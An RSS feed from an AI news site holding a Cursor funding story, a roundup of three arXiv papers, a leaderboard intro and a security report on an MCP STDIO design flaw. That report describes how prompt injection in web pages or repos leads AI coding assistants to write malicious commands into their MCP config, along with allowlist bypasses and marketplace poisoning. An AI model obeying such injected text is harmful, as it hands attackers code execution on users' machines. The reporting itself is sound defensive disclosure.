<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/"><channel><title>Awesome Agents</title><link>https://awesomeagents.ai/</link><description>Your guide to AI models, agents, and the future of intelligence</description><language>en-us</language><managingEditor>contact@awesomeagents.ai (Awesome Agents)</managingEditor><lastBuildDate>Mon, 01 Jan 0001 00:00:00 +0000</lastBuildDate><atom:link href="https://awesomeagents.ai/index.xml" rel="self" type="application/rss+xml"/><image><url>https://awesomeagents.ai/images/logo.png</url><title>Awesome Agents</title><link>https://awesomeagents.ai/</link></image><item><title>Cursor Targets $50B Valuation - Enterprise Now Pays the Bills</title><link>https://awesomeagents.ai/news/cursor-50b-valuation-enterprise-round/</link><pubDate>Sat, 18 Apr 2026 01:59:49 +0200</pubDate><guid>https://awesomeagents.ai/news/cursor-50b-valuation-enterprise-round/</guid><description>&lt;p>Anysphere, the company behind Cursor, is in advanced talks to raise at least $2 billion at a pre-money valuation of $50 billion, according to sources who spoke to TechCrunch and Bloomberg on April 17. The round is already oversubscribed. Andreessen Horowitz and Thrive Capital - both returning backers - are expected to co-lead, with Battery Ventures joining as a new participant and Nvidia taking a strategic position.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>Anysphere, the company behind Cursor, is in advanced talks to raise at least $2 billion at a pre-money valuation of $50 billion, according to sources who spoke to TechCrunch and Bloomberg on April 17. The round is already oversubscribed. Andreessen Horowitz and Thrive Capital - both returning backers - are expected to co-lead, with Battery Ventures joining as a new participant and Nvidia taking a strategic position.</p>
<p>If it closes at those terms, Cursor would nearly double its November 2025 valuation of $29.3 billion in under six months. Eighteen months ago, the company was worth $9.9 billion.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>Anysphere raising $2B+ at <strong>$50B pre-money valuation</strong>; round already oversubscribed</li>
<li>a16z and Thrive Capital co-leading, Battery Ventures new, Nvidia joining as strategic investor</li>
<li>ARR crossed <strong>$2 billion</strong> in February; company projects <strong>$6B+</strong> by end of 2026</li>
<li>Enterprise accounts now <strong>60% of revenue</strong> and carrying positive gross margins</li>
<li>Cursor building its own models to reduce dependency on Anthropic, OpenAI, and others</li>
</ul>
</div>
<h2 id="the-numbers-that-got-investors-here">The Numbers That Got Investors Here</h2>
<p>The case for a $50 billion valuation starts with revenue growth that has almost no precedent in enterprise software. Cursor crossed $500 million in annualized revenue by May 2025, reached $1 billion by October, and surpassed $2 billion in February 2026. The company now projects ending the year above $6 billion ARR - a tripling in under 12 months.</p>
<p>Sixty-seven percent of Fortune 500 companies use Cursor, generating around 150 million lines of enterprise code per day. Enterprise contracts account for 60% of revenue. Those enterprise accounts carry positive gross margins, which matters because Cursor's individual developer subscriptions still run at a loss.</p>
<table>
  <thead>
      <tr>
          <th>Round</th>
          <th>Date</th>
          <th>Valuation</th>
          <th>Key Investors</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Series -</td>
          <td>Jun 2025</td>
          <td>$9.9B</td>
          <td>a16z, Thrive Capital</td>
      </tr>
      <tr>
          <td>Series -</td>
          <td>Nov 2025</td>
          <td>$29.3B</td>
          <td>a16z, Thrive Capital ($2.3B round)</td>
      </tr>
      <tr>
          <td>In talks</td>
          <td>Apr 2026</td>
          <td>$50B</td>
          <td>a16z, Thrive, Battery, Nvidia</td>
      </tr>
  </tbody>
</table>
<p>The gross margin arc matters more than the headline ARR. For most of its short life, Cursor was a growth story with a margin problem: paying Anthropic, OpenAI, and other model providers a large share of every dollar it earned from developers. Two things changed that picture. Cursor launched its own Composer model in November 2025, reducing what it routes to third-party providers. It also integrated models from China's Kimi - cheaper per token than the US frontier providers - for tasks where raw coding performance is less critical.</p>
<p>The combination moved overall gross margins into slightly positive territory. Enterprise accounts, where clients pay annual contracts and run predictable workloads, now show meaningfully better margins than the developer consumer tier.</p>
<h2 id="who-benefits">Who Benefits</h2>
<h3 id="the-founders-and-existing-investors">The Founders and Existing Investors</h3>
<p>Michael Truell and his three co-founders built Anysphere out of MIT without external funding until 2024. Their equity, and that of a16z and Thrive Capital who backed early rounds, has appreciated on a path that would be unusual in any market. At $50 billion, Anysphere would rank behind only OpenAI among US AI company valuations.</p>
<p>Truell, who's 25, has been unusually direct about his competitive strategy. Rather than pretending model providers are partners, he has publicly framed the company's goal as reducing its exposure to them. &quot;We take the best intelligence that the market has to offer from many different providers,&quot; Truell told TechCrunch in December. &quot;And we also do our own product-specific models in places.&quot; The Composer launch was the first concrete step. The funding round provides capital to accelerate that work.</p>
<h3 id="enterprise-it-buyers">Enterprise IT Buyers</h3>
<p>More capital going into Cursor's enterprise engineering team benefits corporate customers directly. The company has been building spend controls, billing groups, usage dashboards, and compliance tooling - the infrastructure that large IT departments require before they can approve company-wide seat deals. With 67% of the Fortune 500 already using Cursor, renewal conversations are happening at scale for the first time.</p>
<h3 id="nvidia">Nvidia</h3>
<p>Nvidia's strategic participation is worth reading carefully. The company invests in AI software startups partly to maintain demand for its GPUs. A Cursor processing 150 million lines of enterprise code per day runs on compute, and Nvidia has a clear interest in that compute budget. It's a different reason than the typical VC bet on returns - Nvidia is buying influence with a company that controls a meaningful slice of AI inference spend.</p>
<p><img src="/images/news/cursor-50b-valuation-enterprise-round-interface.jpg" alt="Cursor's new multi-agent interface showing parallel agent tabs and cloud-native coding workflows">
<em>Cursor's Cursor 3 interface, launched in April 2026, allows developers to run multiple coding agents in parallel across local and cloud environments.</em>
<small>Source: cursor.com</small></p>
<h2 id="who-pays">Who Pays</h2>
<h3 id="new-investors-buying-at-the-peak">New Investors Buying at the Peak</h3>
<p>The investors writing checks at $50 billion are making a specific bet: that Cursor can hold its market position as both model providers and hyperscalers push competing tools. That's harder than it sounds. Anthropic's <a href="/tools/claude-code-vs-cursor-vs-codex">Claude Code</a> crossed $2.5 billion in annualized revenue by February 2026. OpenAI has unified Codex with its broader desktop strategy. Microsoft, which owns GitHub, is pushing Copilot into the same enterprise accounts that Cursor wants.</p>
<blockquote>
<p>&quot;It's pretty clear the market is standardizing on a couple solutions. It's a narrow field of folks really at scale here.&quot;</p>
<ul>
<li>Michael Truell, CEO of Anysphere, to Fortune, March 2026</li>
</ul></blockquote>
<p>Truell's framing is accurate, and it cuts both ways. If the market standardizes on two or three tools, Cursor could be one of them. Or Microsoft could bundle Copilot into existing enterprise agreements at a price Cursor can't match. New investors at $50 billion are paying for the optimistic scenario.</p>
<h3 id="anthropic-and-the-model-providers">Anthropic and the Model Providers</h3>
<p>Cursor's explicit goal of reducing reliance on Anthropic is a direct threat to Anthropic's model revenue. Cursor was one of Anthropic's largest API customers. Each Composer token that replaces a Claude token is revenue Anthropic doesn't see. This dynamic repeats across the AI stack: the most successful application-layer companies tend to eventually build their own models for the tasks they do at scale.</p>
<h3 id="individual-developers">Individual Developers</h3>
<p>The funding round doesn't change the economics of individual Cursor subscriptions right away, but the direction of travel is visible. Cursor's enterprise accounts carry positive margins. Its individual developer accounts do not. That cross-subsidy works until investors want profitability - which they'll eventually demand, especially with an IPO on the horizon. Individual pricing will likely go up before any Cursor listing.</p>
<p><img src="/images/news/cursor-50b-valuation-enterprise-round-investors.jpg" alt="A group of investors reviewing growth charts at a meeting table">
<em>Enterprise sales cycles and Fortune 500 adoption drove Cursor's shift from a developer tool to a boardroom purchase - and brought a different class of investor with it.</em>
<small>Source: unsplash.com</small></p>
<h2 id="counter-argument-what-bears-will-say">Counter-Argument: What Bears Will Say</h2>
<p>The bear case on Cursor has been consistent since the company's first large valuation: the product's core function - helping developers write code with AI assistance - is a commodity waiting to happen. Every major model provider wants to control the coding interface. Apple Silicon, AMD, and Intel are all chasing inference cost reductions that would make running local models viable at enterprise scale, removing Cursor's control over model selection.</p>
<p>The company's response is to be the best end-to-end tool regardless of which model sits underneath it. <a href="/news/cursor-2b-arr-fastest-saas">Cursor's $2 billion ARR milestone</a> was partly built on integrating the best available model at any given moment - switching from GPT-4 to Claude 3.5 to Gemini as each took the lead. The Composer model is an attempt to own the layer that matters most for code-specific tasks. Whether a proprietary coding model can stay competitive with Anthropic's and OpenAI's frontier research teams, with a fraction of the budget, is the real question.</p>
<hr>
<p>At $50 billion, Cursor is a bet on enterprise software margins - and the terms will be set by whether Anysphere can make its own models good enough to stop paying the companies most likely to kill it.</p>
<p><strong>Sources:</strong></p>
<ul>
<li><a href="https://techcrunch.com/2026/04/17/sources-cursor-in-talks-to-raise-2b-at-50b-valuation-as-enterprise-growth-surges/">Cursor in talks to raise $2B+ at $50B valuation as enterprise growth surges - TechCrunch</a></li>
<li><a href="https://techcrunch.com/2026/03/02/cursor-has-reportedly-surpassed-2b-in-annualized-revenue/">Cursor has reportedly surpassed $2B in annualized revenue - TechCrunch</a></li>
<li><a href="https://techcrunch.com/2025/06/05/cursors-anysphere-nabs-9-9b-valuation-soars-past-500m-arr/">Cursor's Anysphere nabs $9.9B valuation, soars past $500M ARR - TechCrunch</a></li>
</ul>
]]></content:encoded><dc:creator>Daniel Okafor</dc:creator><category>News</category><media:content url="https://awesomeagents.ai/images/news/cursor-50b-valuation-enterprise-round_hu_5448620bf4f0a0ac.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/news/cursor-50b-valuation-enterprise-round_hu_5448620bf4f0a0ac.jpg" width="1200" height="675"/></item><item><title>MCP&amp;#39;s STDIO Flaw Puts 200K AI Servers at Risk</title><link>https://awesomeagents.ai/news/mcp-stdio-rce-design-flaw-200k-servers/</link><pubDate>Fri, 17 Apr 2026 22:57:46 +0200</pubDate><guid>https://awesomeagents.ai/news/mcp-stdio-rce-design-flaw-200k-servers/</guid><description>&lt;p>A design decision baked into Anthropic's Model Context Protocol is putting hundreds of thousands of AI-powered servers at risk of complete takeover - and Anthropic has declined to fix it.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>A design decision baked into Anthropic's Model Context Protocol is putting hundreds of thousands of AI-powered servers at risk of complete takeover - and Anthropic has declined to fix it.</p>
<p>Ox Security, a Tel Aviv-based application security firm founded by former Check Point executives Neatsun Ziv and Lion Arzi, published its findings on April 15. The research catalogues 30+ responsible disclosures, 10 CVEs (all rated critical or high), and live proof-of-concept exploitation on six production platforms. The root cause isn't a bug in any one implementation. It's how MCP's STDIO transport was designed from the start.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>MCP's STDIO interface executes OS commands before verifying whether a valid server started - any payload gets through regardless of handshake failure</li>
<li>Affects 200K+ server instances across all 10 official MCP SDKs: Python, TypeScript, Java, Kotlin, C#, Go, Ruby, Swift, PHP, and Rust</li>
<li>Claude Code, Cursor, Windsurf, GitHub Copilot, OpenAI Codex, and Gemini CLI are all exposed via a prompt-injection-to-local-RCE chain</li>
<li>Anthropic called the behavior &quot;expected&quot; and added a documentation note rather than adjusting the protocol</li>
</ul>
</div>
<h2 id="how-stdio-transport-actually-executes-commands">How STDIO Transport Actually Executes Commands</h2>
<p>MCP supports two transport mechanisms: HTTP+SSE for remote connections and STDIO for local ones. When a host application - Claude Code or Cursor, for instance - needs to spawn a MCP server, it passes a command string to the STDIO interface. That interface launches the subprocess, then waits for the MCP handshake to succeed.</p>
<p>The problem is that the command executes before the handshake check.</p>
<pre tabindex="0"><code># Simplified execution sequence with a malicious command string:
1. MCP STDIO receives: &#34;malicious-payload &amp;&amp; exfiltrate-keys&#34;
2. OS executes the command string  -&gt;  payload runs
3. MCP handshake fails (no valid server started)
4. Error is returned to the caller
# The payload already ran. The error doesn&#39;t matter.
</code></pre><p>Ox researchers describe this as &quot;execute first, validate never.&quot; Any user-controlled string that reaches the STDIO configuration layer becomes a potential RCE vector. No authentication required. No sandboxing applied. This behavior runs through all ten official MCP SDK implementations.</p>
<h2 id="the-four-attack-families">The Four Attack Families</h2>
<h3 id="1-direct-ui-injection">1. Direct UI Injection</h3>
<p>The simplest path. Frameworks like LangFlow (CVE pending) and GPT Researcher (CVE-2025-65720) expose web interfaces that accept MCP configuration directly. For LangFlow, no account is needed - a session token is &quot;freely available,&quot; per Ox's report. Sending a crafted payload through the UI gets arbitrary code running on the server. Agent Zero (CVE-2026-30624) falls to the same class of attack via its unauthenticated interface.</p>
<h3 id="2-hardening-bypass">2. Hardening Bypass</h3>
<p>Some tools tried allowlisting to restrict which commands could run. Flowise (GHSA-c9gw-hvqq) had one - researchers bypassed it by routing commands through <code>npx</code>'s <code>-c</code> flag, which the allowlist didn't cover. Upsonic (CVE-2026-30625) fell to a similar approach. The lesson from both: if the underlying STDIO execution model doesn't confirm, surface-level allowlists provide false confidence.</p>
<h3 id="3-prompt-injection-to-local-rce">3. Prompt Injection to Local RCE</h3>
<p>This is the attack chain that reaches the tools most developers use every day. An AI coding assistant processes content from a web page, a document, or a code repository. That content carries a prompt injection payload instructing the assistant to modify its MCP server configuration. The assistant writes the malicious command to STDIO config. STDIO executes it.</p>
<p>Windsurf received CVE-2026-30615 for a zero-click variant - visiting a malicious website was enough to trigger the full chain. Claude Code, Cursor, GitHub Copilot, OpenAI Codex, and Gemini CLI require some user interaction, but Ox confirms all are within the exposure window. Their respective vendors classified this as &quot;by design.&quot;</p>
<p><img src="/images/news/mcp-stdio-rce-design-flaw-200k-servers-code-screen.jpg" alt="Binary code streaming down a dark terminal screen">
<em>The attack chain turns AI coding assistants into the delivery mechanism - the same tool that reads your source code can be instructed to execute arbitrary commands on your machine.</em>
<small>Source: unsplash.com</small></p>
<h3 id="4-marketplace-poisoning">4. Marketplace Poisoning</h3>
<p>Ox tested 11 MCP marketplace directories. Nine accepted malicious MCP entries without review. A poisoned entry sits in the directory waiting for developers to install it. Once installed, it can substitute a legitimate SSE transport connection for a local STDIO connection. At that point, the attacker controls what runs on the developer's machine.</p>
<h2 id="confirmed-cves">Confirmed CVEs</h2>
<table>
  <thead>
      <tr>
          <th>Tool / Framework</th>
          <th>CVE</th>
          <th>Attack Type</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Windsurf (AI IDE)</td>
          <td>CVE-2026-30615</td>
          <td>Prompt injection - local RCE (zero-click)</td>
      </tr>
      <tr>
          <td>LiteLLM</td>
          <td>CVE-2026-30623</td>
          <td>Authenticated config injection</td>
      </tr>
      <tr>
          <td>Agent Zero</td>
          <td>CVE-2026-30624</td>
          <td>Unauthenticated injection</td>
      </tr>
      <tr>
          <td>GPT Researcher</td>
          <td>CVE-2025-65720</td>
          <td>UI injection - reverse shell</td>
      </tr>
      <tr>
          <td>Fay Framework</td>
          <td>CVE-2026-30618</td>
          <td>Direct injection</td>
      </tr>
      <tr>
          <td>Upsonic</td>
          <td>CVE-2026-30625</td>
          <td>Allowlist bypass</td>
      </tr>
      <tr>
          <td>Flowise</td>
          <td>GHSA-c9gw-hvqq</td>
          <td>npx flag injection</td>
      </tr>
      <tr>
          <td>LangFlow</td>
          <td>CVE pending</td>
          <td>Unauthenticated session takeover</td>
      </tr>
      <tr>
          <td>DocsGPT</td>
          <td>CVE-2026-26015</td>
          <td>Transport-layer substitution</td>
      </tr>
  </tbody>
</table>
<p>Claude Code, Cursor, GitHub Copilot, and Gemini CLI don't appear in the CVE list - not because they're safe, but because their vendors declined to assign CVEs, treating the prompt-injection path as an accepted risk in the current threat model.</p>
<p><img src="/images/news/mcp-stdio-rce-design-flaw-200k-servers-ide-terminal.jpg" alt="Developer at a workstation with multiple security warning alerts on screen">
<em>MCP-enabled IDEs are high-value targets: they run with local file access, network access, and often terminal permissions on the developer's machine.</em>
<small>Source: unsplash.com</small></p>
<h2 id="the-disclosure-timeline">The Disclosure Timeline</h2>
<ul class="timeline">
<li>
<p><strong>November 2025</strong> - Ox Security begins investigating MCP's STDIO transport behavior after observing inconsistent execution semantics.</p>
</li>
<li>
<p><strong>January 7, 2026</strong> - Initial contact with Anthropic. Researchers present the root issue and propose architectural fixes that would protect all downstream implementations.</p>
</li>
<li>
<p><strong>January 16, 2026</strong> - Anthropic updates its SECURITY.md, recommending caution with STDIO adapters. No protocol changes made.</p>
</li>
<li>
<p><strong>January - March 2026</strong> - 30+ responsible disclosures filed across affected projects. LiteLLM, DocsGPT, Flowise, and Bisheng issue patches for their specific CVEs.</p>
</li>
<li>
<p><strong>March 18, 2026</strong> - LangFlow formally acknowledges the issue.</p>
</li>
<li>
<p><strong>April 15, 2026</strong> - Ox publishes the full report. The MCP protocol architecture remains unchanged.</p>
</li>
</ul>
<h2 id="where-it-falls-short">Where It Falls Short</h2>
<p>The standard defense Anthropic and affected vendors are offering is &quot;sanitize your inputs.&quot; That's correct advice in isolation - developers building MCP servers should absolutely validate anything that reaches command execution. The problem is what it means in practice for the broader ecosystem.</p>
<p>Over 200 open-source projects inherited this exposure by building on Anthropic's official SDKs. A single architectural fix at the protocol level would have protected all of them. Ox's researchers put the ask clearly: &quot;One architectural change at the protocol level would have protected every downstream project, every developer, and every end user.&quot;</p>
<p>Anthropic had five months between initial disclosure and public release to implement that fix. The company added a warning to its documentation instead.</p>
<p>This fits a pattern that's become familiar in the MCP ecosystem. A <a href="/news/kali-mcp-server-command-injection-shell-true/">command injection flaw in the Kali Linux MCP server</a> showed up in February, affecting penetration testing tools running with elevated permissions. <a href="/news/claude-code-rce-api-key-theft-vulnerabilities/">Multiple RCE paths in Claude Code itself</a> were disclosed earlier this year. Earlier still, the <a href="/news/litellm-supply-chain-compromise-credential-theft/">LiteLLM supply chain compromise</a> showed how a single widely-used inference layer becomes the delivery mechanism for downstream attacks. MCP's footprint is much larger than any of those - at 97 million monthly SDK downloads across all language implementations, the scope of a unaddressed protocol-level flaw is substantial.</p>
<h2 id="what-developers-should-do">What Developers Should Do</h2>
<p>The upstream fix isn't imminent. Mitigations to apply now:</p>
<ol>
<li><strong>Restrict MCP services to private IP addresses</strong> - don't expose MCP endpoints to the public internet under any circumstances</li>
<li><strong>Treat all MCP configuration as untrusted</strong> - any user-controlled string reaching STDIO config is a potential attack vector</li>
<li><strong>Sandbox MCP processes</strong> - run with minimal permissions, isolated from credentials, secrets, and sensitive file paths</li>
<li><strong>Audit marketplace installs</strong> - verify MCP entries before installation; prefer packages with active maintainers and documented security review</li>
<li><strong>Apply available patches</strong> - LiteLLM, DocsGPT, Flowise, and Bisheng have addressed their specific CVEs; update right away</li>
<li><strong>Log tool invocations</strong> - monitoring what MCP-enabled tools are actually executing makes exploitation visible before damage spreads</li>
</ol>
<p>Anthropic has not announced any architectural changes to the protocol today. The 10 CVEs issued so far represent confirmed exploits on real production systems; Ox expects additional CVEs as more projects are audited.</p>
<hr>
<p><strong>Sources:</strong></p>
<ul>
<li><a href="https://www.theregister.com/2026/04/16/anthropic_mcp_design_flaw/">Anthropic won't own MCP 'design flaw' putting 200K servers at risk - The Register</a></li>
<li><a href="https://www.infosecurity-magazine.com/news/systemic-flaw-mcp-expose-150/">Systemic Flaw in MCP Protocol Could Expose 150 Million Downloads - Infosecurity Magazine</a></li>
<li><a href="https://www.computing.co.uk/news/2026/security/flaw-in-anthropic-s-mcp-putting-200k-servers-at-risk">Flaw in Anthropic's MCP putting 200k servers at risk, researchers claim - Computing</a></li>
<li><a href="https://www.ox.security/blog/mcp-supply-chain-advisory-rce-vulnerabilities-across-the-ai-ecosystem/">MCP Supply Chain Advisory - Ox Security</a></li>
<li><a href="https://www.cyberkendra.com/2026/04/anthropics-mcp-design-flaw-enables.html">Anthropic's MCP Design Flaw Enables Remote Code Execution - Cyber Kendra</a></li>
<li><a href="https://www.csoonline.com/article/4159889/rce-by-design-mcp-architectural-choice-haunts-ai-agent-ecosystem.html">RCE by design: MCP architectural choice haunts AI agent ecosystem - CSO Online</a></li>
</ul>
]]></content:encoded><dc:creator>Sophie Zhang</dc:creator><category>News</category><media:content url="https://awesomeagents.ai/images/news/mcp-stdio-rce-design-flaw-200k-servers_hu_5fa2370a01da7769.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/news/mcp-stdio-rce-design-flaw-200k-servers_hu_5fa2370a01da7769.jpg" width="1200" height="675"/></item><item><title>MoE Routing, Prompt Gambles, and Where Reasoning Breaks</title><link>https://awesomeagents.ai/science/moe-routing-prompt-gambles-reasoning-breaks/</link><pubDate>Fri, 17 Apr 2026 21:52:18 +0200</pubDate><guid>https://awesomeagents.ai/science/moe-routing-prompt-gambles-reasoning-breaks/</guid><description>&lt;p>Three arXiv papers landed this week that share a quieter kind of argument. None of them announce a breakthrough model or a new capability. Each one takes a practice people rely on and shows that the theory underneath it doesn't hold. MoE routing sophistication, automated prompt optimization, and brute-force compute during reasoning chains - all three come up shorter than expected.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>Three arXiv papers landed this week that share a quieter kind of argument. None of them announce a breakthrough model or a new capability. Each one takes a practice people rely on and shows that the theory underneath it doesn't hold. MoE routing sophistication, automated prompt optimization, and brute-force compute during reasoning chains - all three come up shorter than expected.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li><strong>Equifinality in MoE</strong> - Five different routing designs produce statistically equivalent perplexity; routing topology is a red herring in architecture search</li>
<li><strong>Prompt Optimization Is a Coin Flip</strong> - 49% of optimization runs on Claude Haiku scored below zero-shot; a cheap two-step diagnostic tells you when it's worth trying</li>
<li><strong>GUARD</strong> - LLM reasoning errors cluster at a small number of early &quot;transition points&quot; marked by entropy spikes, not scattered randomly across the chain</li>
</ul>
</div>
<h2 id="moe-routing-topology-doesnt-determine-quality">MoE Routing Topology Doesn't Determine Quality</h2>
<p><strong>Authors:</strong> Ivan Ternovtsii and Yurii Bilak | arXiv:2604.14419</p>
<p>Sparse Mixture-of-Experts (MoE) architectures have become a standard tool for scaling LLMs without proportionally scaling compute. The design assumption is that routing - the mechanism that dispatches tokens to specific experts - is one of the main levers for quality. A more sophisticated router, the logic goes, means better expert specialization and better outcomes.</p>
<p>Ternovtsii and Bilak ran 62 controlled experiments on WikiText-103 to test that assumption directly. They built ST-MoE, a geometric routing system that uses cosine-similarity matching against learned centroids in a 64-dimensional space, then compared five variants of this approach against standard linear routers.</p>
<h3 id="the-equifinality-result">The Equifinality Result</h3>
<p>All five cosine-routing variants landed within a 1-perplexity margin of each other (range: 33.93 to 34.72 PPL). Using rigorous Two One-Sided Tests (TOST) across 15 runs and 3 seeds, the differences were statistically equivalent - not just small, but provably negligible.</p>
<p>Standard linear routers achieved 32.76 PPL, which is noticeably better. But they used 5.3 times more routing parameters to get there. When the researchers built an iso-parameter cosine routing variant, it closed 67% of that gap. The mechanistic advantage of the linear router narrowed to roughly 1.2%.</p>
<p>The multi-hop routing updates showed cosine similarity of 0.805 between update vectors - essentially pointing in the same direction. They're doing magnitude amplification, not compositional computation. A single learnable scalar reproduced that behavior.</p>
<div class="pull-quote">
<p>Routing topology may matter less than previously assumed. Future optimization efforts should focus elsewhere.</p>
</div>
<p>The most actionable finding is the zero-shot relative-norm halting result: by stopping routing computation early based on a relative-norm criterion, the system saved 25% of MoE FLOPs with only a 0.12% PPL degradation. That's a free efficiency gain available right now, independent of routing design choices.</p>
<p><img src="/images/science/moe-routing-prompt-gambles-reasoning-breaks-routing.jpg" alt="Abstract network connectivity visualization">
<em>Network routing patterns - the complexity of routing mechanisms in MoE architectures may matter less than researchers have assumed.</em>
<small>Source: unsplash.com</small></p>
<p>For anyone doing architecture search on MoE systems, this is a significant reallocation of effort. The routing mechanism isn't where the performance comes from. Earlier work at Awesome Agents covering <a href="/science/moe-myths-context-compression-steering-proofs/">MoE routing myths and context compression</a> reached adjacent conclusions - this paper sharpens the argument with controlled experimental evidence.</p>
<hr>
<h2 id="prompt-optimization-is-a-coin-flip">Prompt Optimization Is a Coin Flip</h2>
<p><strong>Authors:</strong> Xing Zhang, Guanghui Wang, Yanwei Cui, Wei Qiu, Ziyuan Li, Bing Zhu, Peiyang He | arXiv:2604.14585</p>
<p>Automated prompt optimization frameworks like DSPy and TextGrad are now a standard part of many LLM pipelines. The assumption is that running optimization over prompts improves downstream task performance. You pay compute costs upfront, save on manual prompt engineering, and get a better system.</p>
<p>Zhang et al. tested that assumption across 72 optimization runs (6 methods × 4 tasks × 3 repeats) and 18,000 grid evaluations across 144 additional optimization runs, using Claude Haiku and Amazon Nova Lite as their target models.</p>
<h3 id="the-49-failure-rate">The 49% Failure Rate</h3>
<p>On Claude Haiku, 49% of optimization runs scored below zero-shot baseline. Amazon Nova Lite showed an even higher failure rate. The optimization methods included approaches from the DSPy and TextGrad ecosystems with four other automated techniques.</p>
<p>One task was different: all six methods improved by up to 6.8 points over zero-shot. That divergence is the key to understanding when optimization works and when it doesn't. The successful task had what the authors call &quot;exploitable output structure&quot; - a format the model can produce but doesn't default to. The optimizer discovers and enforces that format. Tasks without that property don't benefit.</p>
<p>The team also tested a popular assumption underlying these frameworks: that agent prompt interactions are a meaningful optimization target. Across all experiments, those interactions were never statistically significant (p &gt; 0.52, all F-statistics below 1.0). The coupling between prompts in multi-agent systems, which tools like TextGrad attempt to optimize jointly, doesn't show up as a real effect.</p>
<h3 id="the-diagnostic">The Diagnostic</h3>
<p>Rather than abandoning prompt optimization, the paper proposes a two-step check before running an expensive optimization campaign:</p>
<ol>
<li>An $80 ANOVA pre-test to assess whether agent coupling is real for the specific task</li>
<li>A 10-minute headroom test that checks whether the task has exploitable output structure</li>
</ol>
<p>If neither condition holds, optimization is unlikely to beat zero-shot. The diagnostic costs less than a single failed optimization run.</p>
<p>For anyone building compound AI systems, this finding is directly actionable. The <a href="/guides/prompt-engineering-basics/">prompt engineering basics</a> assumptions worth questioning aren't about which optimizer to use - they're about whether optimization is the right move at all for a given task.</p>
<hr>
<h2 id="guard-finding-where-reasoning-actually-breaks">GUARD: Finding Where Reasoning Actually Breaks</h2>
<p><strong>Authors:</strong> Wei Zhu, Jian Zhang, Lixing Yu, Kun Yue, Zhiwen Tang | arXiv:2604.14528 | Accepted at ACL 2026</p>
<p>Extended reasoning chains in LLMs - the kind generated by <a href="/guides/what-are-ai-reasoning-models/">AI reasoning models</a> - are assumed to reduce errors by allowing more computation. When a model fails, the implicit model is that errors build up gradually, or appear late in the chain when complexity builds up. Neither assumption is quite right.</p>
<p>Zhu et al. studied the distribution of reasoning errors across long inference chains and found something more tractable: &quot;errors are not uniformly distributed but often originate from a small number of early transition points.&quot; After one of these critical junctures, the reasoning stays internally consistent - it's just consistent with a wrong premise.</p>
<h3 id="the-entropy-signal">The Entropy Signal</h3>
<p>These failure points correlate with localized increases in token-level entropy. The model hesitates, in a measurable sense, and the direction it picks at that moment determines whether the rest of the chain succeeds or fails. Importantly, alternative paths from the same intermediate state can still yield correct answers - the fork hasn't committed the model to failure yet.</p>
<p>The GUARD framework uses these entropy signals to identify critical transitions at inference time and proactively redirect the reasoning toward alternative paths. Testing across multiple benchmarks confirmed that targeting these specific junctures improves reliability more efficiently than increasing total compute.</p>
<p><img src="/images/science/moe-routing-prompt-gambles-reasoning-breaks-reasoning.jpg" alt="Abstract AI visualization with branching pathways">
<em>Reasoning chains in LLMs don't fail gradually - errors originate at specific early transition points where token-level entropy spikes.</em>
<small>Source: unsplash.com</small></p>
<p>This connects to earlier work on <a href="/science/reasoning-traps-llm-chaos-steering-curves/">reasoning traps and LLM instability</a>, which documented failure modes without a clear intervention mechanism. GUARD provides one: a targeted inference-time redirect based on measurable uncertainty, not a blanket increase in sampling budget.</p>
<p>The practical implication is a shift in how to think about reasoning chain failures. The question isn't &quot;how long should the chain be&quot; - it's &quot;where does the chain first deviate and can we catch it.&quot;</p>
<hr>
<h2 id="the-common-thread">The Common Thread</h2>
<p>None of these papers argue for simplicity as an end in itself. What they share is a case for measurement before investment. MoE routing design is worth measuring before assuming it drives quality. Prompt optimization is worth pre-testing before running an expensive campaign. Reasoning chain failures are worth locating before adding compute.</p>
<p>The diagnostic tools in all three papers are cheap relative to the resources they save. That's a pattern worth following: before adding machinery, check whether the machinery does what you think it does.</p>
<hr>
<p><strong>Sources:</strong></p>
<ul>
<li><a href="https://arxiv.org/abs/2604.14419">Equifinality in Mixture of Experts - arXiv:2604.14419</a></li>
<li><a href="https://arxiv.org/abs/2604.14585">Prompt Optimization Is a Coin Flip - arXiv:2604.14585</a></li>
<li><a href="https://arxiv.org/abs/2604.14528">Dissecting Failure Dynamics in LLM Reasoning (GUARD) - arXiv:2604.14528</a></li>
</ul>
]]></content:encoded><dc:creator>Elena Marchetti</dc:creator><category>Science</category><media:content url="https://awesomeagents.ai/images/science/moe-routing-prompt-gambles-reasoning-breaks_hu_e8b16e7846e8f3d.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/science/moe-routing-prompt-gambles-reasoning-breaks_hu_e8b16e7846e8f3d.jpg" width="1200" height="675"/></item><item><title>Web Agent Benchmarks Leaderboard: Apr 2026</title><link>https://awesomeagents.ai/leaderboards/web-agent-benchmarks-leaderboard/</link><pubDate>Fri, 17 Apr 2026 20:13:55 +0200</pubDate><guid>https://awesomeagents.ai/leaderboards/web-agent-benchmarks-leaderboard/</guid><description>&lt;p>Web agents are the part of the AI stack where the rubber actually meets the road. Not a chat window - a model that opens a browser, reads what's on the screen, clicks buttons, fills forms, and either completes the task or fails. The benchmarks that measure this are messy, fragmented, and far harder to game than static multiple-choice evals. That's exactly why they matter.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>Web agents are the part of the AI stack where the rubber actually meets the road. Not a chat window - a model that opens a browser, reads what's on the screen, clicks buttons, fills forms, and either completes the task or fails. The benchmarks that measure this are messy, fragmented, and far harder to game than static multiple-choice evals. That's exactly why they matter.</p>
